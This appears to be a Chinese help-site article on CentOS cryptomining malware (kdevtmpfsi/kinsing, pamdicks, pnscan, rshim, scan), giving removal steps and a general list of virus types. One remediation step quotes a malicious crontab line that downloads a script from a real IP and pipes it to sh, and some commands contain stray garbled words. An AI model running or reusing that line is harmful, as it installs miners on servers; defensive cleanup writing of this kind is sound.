centos病毒有哪些

小编 639

centos病毒有:1.kdevtmpfsi病毒;2.pamdicks病毒;3.pnscan病毒;4.rshim病毒;5.scan病毒。kdevtmpfsi病毒是入侵centos系统的一种常见挖矿病毒,要解决该病毒引起的CPU占用问题,除了要删掉kdevtmpfsi进程外,还需要将其守护进程kinsing清理掉。

1.kdevtmpfsi病毒

kdevtmpfsi是一个挖矿病毒,大多数都是redis程序侵入,通常比较明显就是占用高额的CPU、内存资源。kdevtmpfsi有守护进程,单独kill掉kdevtmpfsi进程会不断恢复占用,其守护进程名称为kinsing,需要kill后才能解决问题。具体解决方法:(1)先去相应的云服务商那里修改安全组,暂时关闭所有相关服务的端口,防止病毒重新感染;

(2)依次杀掉kinsing 和kdevtmpfsi 对应的进程(kinsing 是kdevtmpfsi 病毒的守护进程);

(3)删除kdevtmfsi病毒的脚本;

(4)检查crontab,如果发现有这条* * * * * wget -q -O – http://195.3.146.118/sc.sh|sh > /dev/null 2>&1,就删掉;

(5)给那些没有设置密码且暴露了端口的服务,设置相应的密码,并重启。如果业务需要,就开放回相应的端口,恢复服务。

2.pamdicks病毒

pamdicks病毒属于挖矿木马病毒,也是入侵centos7系统的常见病毒之一。该病毒引起的故障现象为:开发使用过程中,发现经常有服务无故关闭,登录服务器经检查,发现CPU使用率达到100%。在检测异常进程中,未发现CPU使用率异常的进程(使用较好 以及ps -aux 进行检查)。

临时处理办法:根据系统环境变量,检查各目录下是否存在pamdicks,共计有两个/usr/bin/pamdicks和/bin/pamdicks;删除原文件,并创建一个顶包空文件,然后使用系统chattr对其进行锁定禁止修改;再根据sysdig -c 较好procs_cpu查到的PID直接杀掉。

3.pnscan病毒

pnscan是比较有名的挖矿蠕虫病毒,攻击手段为通过redis感染服务器,如果redis的端口为默认的6379且暴露在公网上,且没有设置客户端连接密码认证,很容易感染,这个病毒是分级别的。解决方法如下:

(1)首先通过busybox 较好查看pnscan的路径,

(2)删除pnscan,可能文件是只读的,不能被删除,需要通过busybox lsattr 文件名查看文件的属性,一般属性是-a或者-i,然后执行busybox chattr –a/-i 文件名更改文件属性后即可删除

(3)杀掉pnscan相关进程。

4.rshim病毒

rshim病毒也是挖矿病毒的一种,常见于以root用户启动redis服务,并且redis使用默认端口,导致6379端口被攻击。解决方法跟pnscan差不多,在查找文件和进程的时候,发现由hilde用户执行,在home目录下多了个hilde目录,里面创建了免密登录的公钥,需要hilde整个目录删除,之后执行userdel –r hilde删除该用户。

5.scan病毒

scan也是通过redis进行攻击的,如果电脑cpu占满也可能是因为这个进程,解决方案跟上面相似,也是先查路径,再删文件,再杀进程。

延伸阅读

电脑系统常见的病毒种类有哪些

1.文件型病毒

文件型病毒是一种受感染的可执行文件,也就是.exe病毒文件。当执行受感染的文件时,电脑病毒会将自己复制到其他可执行文件中,导致其他文件受感染。

2.宏病毒

宏病毒专门感染Word文档,是利用微软的VB脚本语言开发出来的程序,以宏的方式附在Word文档中,称之为宏病毒。

3.挖矿病毒

挖矿病毒入侵以后,电脑系统CPU占用接近100%;系统卡顿执行基本命令响应缓慢;系统出现异常进程无法正常kill;系统内存异常占用不稳定。

4.特洛伊木马

黑客常利用特洛伊木马,来窃取用户的密码资料或破坏硬盘内程序或数据的目的,它看似是一个正常的程序,但执行时隐藏在其背后的恶意程序也将随之行动,就会对电脑进行破坏。但该特洛伊木马不会自行复制,因此往往是以伪装的样式诱骗电脑用户将其置入电脑中。

5.蠕虫病毒

蠕虫病毒蠕虫病毒利用网络快速地扩散,从而使更多的电脑遭受病毒的入侵,是一种自行复制的可由网络扩散的恶意程序。

6.引导型病毒

引导型病毒主要感染硬盘的主引导扇区,导致计算机无法正常启动。

7.混合型病毒

这种病毒兼有引导型病毒和文件型病毒的综合特点,既感染主引导扇区,又会感染和破坏文件。

回复

我来回复
  • 暂无回复内容

注册PingCode 在线客服
站长微信
站长微信
电话联系

400-800-1024

工作日9:30-21:00在线

分享本页
返回顶部